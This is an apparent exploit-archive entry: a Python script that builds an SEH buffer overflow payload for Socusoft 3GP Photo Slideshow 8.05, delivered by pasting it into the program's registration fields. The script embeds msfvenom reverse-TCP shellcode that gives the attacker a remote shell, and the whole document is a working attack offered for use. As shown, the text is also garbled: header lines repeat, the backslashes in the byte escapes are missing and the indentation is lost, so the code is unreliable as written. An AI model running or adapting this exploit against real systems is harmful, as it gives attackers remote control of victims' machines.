Socusoft 3GP Photo Slideshow 8.05 Buffer Overflow

# Exploit Title: Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Exploit Title: Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://www.dvd-photo-slideshow.com/3gp-photo-slideshow.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key". Click "Apply" > "Ok"
# You will see a sweet reverse shell poped up in your attacker box.

buffer = "A" * (512)
# 0x10030b2d : pop ebx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0 (
# C:Program FilesSocusoftSocusoft 3GP Photo SlideshowDVDPhotoData.dll)
nseh = "xebx06x90x90"
seh = "x2dx0bx03x10"
nops = "x90" * 18
#Badchar x00x0ax0d
#sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b 'x00x0ax0d' -f python

buf = ""
buf += "xb8x4cxabxe1x3cxd9xd0xd9x74x24xf4x5bx33"
buf += "xc9xb1x52x31x43x12x83xebxfcx03x0fxa5x03"
buf += "xc9x73x51x41x32x8bxa2x26xbax6ex93x66xd8"
buf += "xfbx84x56xaaxa9x28x1cxfex59xbax50xd7x6e"
buf += "x0bxdex01x41x8cx73x71xc0x0ex8exa6x22x2e"
buf += "x41xbbx23x77xbcx36x71x20xcaxe5x65x45x86"
buf += "x35x0ex15x06x3exf3xeex29x6fxa2x65x70xaf"
buf += "x45xa9x08xe6x5dxaex35xb0xd6x04xc1x43x3e"
buf += "x55x2axefx7fx59xd9xf1xb8x5ex02x84xb0x9c"
buf += "xbfx9fx07xdex1bx15x93x78xefx8dx7fx78x3c"
buf += "x4bxf4x76x89x1fx52x9bx0cxf3xe9xa7x85xf2"
buf += "x3dx2exddxd0x99x6ax85x79xb8xd6x68x85xda"
buf += "xb8xd5x23x91x55x01x5exf8x31xe6x53x02xc2"
buf += "x60xe3x71xf0x2fx5fx1dxb8xb8x79xdaxbfx92"
buf += "x3ex74x3ex1dx3fx5dx85x49x6fxf5x2cxf2xe4"
buf += "x05xd0x27xaax55x7ex98x0bx05x3ex48xe4x4f"
buf += "xb1xb7x14x70x1bxd0xbfx8bxccxd5x3fx91x09"
buf += "x82x3dx95x14x6bxcbx73x7cx9bx9dx2cxe9x02"
buf += "x84xa6x88xcbx12xc3x8bx40x91x34x45xa1xdc"
buf += "x26x32x41xabx14x95x5ex01x30x79xccxcexc0"
buf += "xf4xedx58x97x51xc3x90x7dx4cx7ax0bx63x8d"
buf += "x1ax74x27x4axdfx7bxa6x1fx5bx58xb8xd9x64"
buf += "xe4xecxb5x32xb2x5ax70xedx74x34x2ax42xdf"
buf += "xd0xabxa8xe0xa6xb3xe4x96x46x05x51xefx79"
buf += "xaax35xe7x02xd6xa5x08xd9x52xd5x42x43xf2"
buf += "x7ex0bx16x46xe3xacxcdx85x1ax2fxe7x75xd9"
buf += "x2fx82x70xa5xf7x7fx09xb6x9dx7fxbexb7xb7"

pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"